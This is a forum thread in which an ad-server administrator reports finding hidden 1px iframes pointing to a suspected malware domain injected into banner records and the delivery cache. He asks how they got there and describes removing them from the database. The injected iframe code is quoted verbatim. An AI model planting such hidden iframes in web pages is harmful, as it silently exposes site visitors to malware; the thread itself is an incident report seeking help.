Strange Iframe Requests In Banners

[pxl_rene]

heya folks,

 

as our ad infrastructure has been hacked multiple times, i was just playing around with my mysql proxy on my system for testing purposes.

 

So, while i was looking at the screen i noticed something i have seen before - strange queries.

 

"<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>\";s:9:\"htmlcache\";s:169:\"<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>

 

I saw that domain some time ago and now im wondering what this is.

Im guessing that this is some code, which surely doesnt belong there.

So now my question is, how it got there and what its supposed to mean and how i can get rid of it?

 

kind regards,

 

rene

 

[pxl_rene]

hey, 

 

this happens in the deliverycache for example. But i cant find the code in the Admin Interface.

So which part of the Adserver is responsible for the generation of the deliverycache php files?

[pxl_rene]

After some research it showed that once back in time, ikromet.c0m.li was linked to an ukranian IP (no offense intended) and seems like this was used for serving malware stuff. 1px iframe, which nobody notices.

 

So i went to the table oa_banners and searched for banners with ikromet in its fields.

I replaced every field with an empty string.

 

But im still interested in how this got into the databases..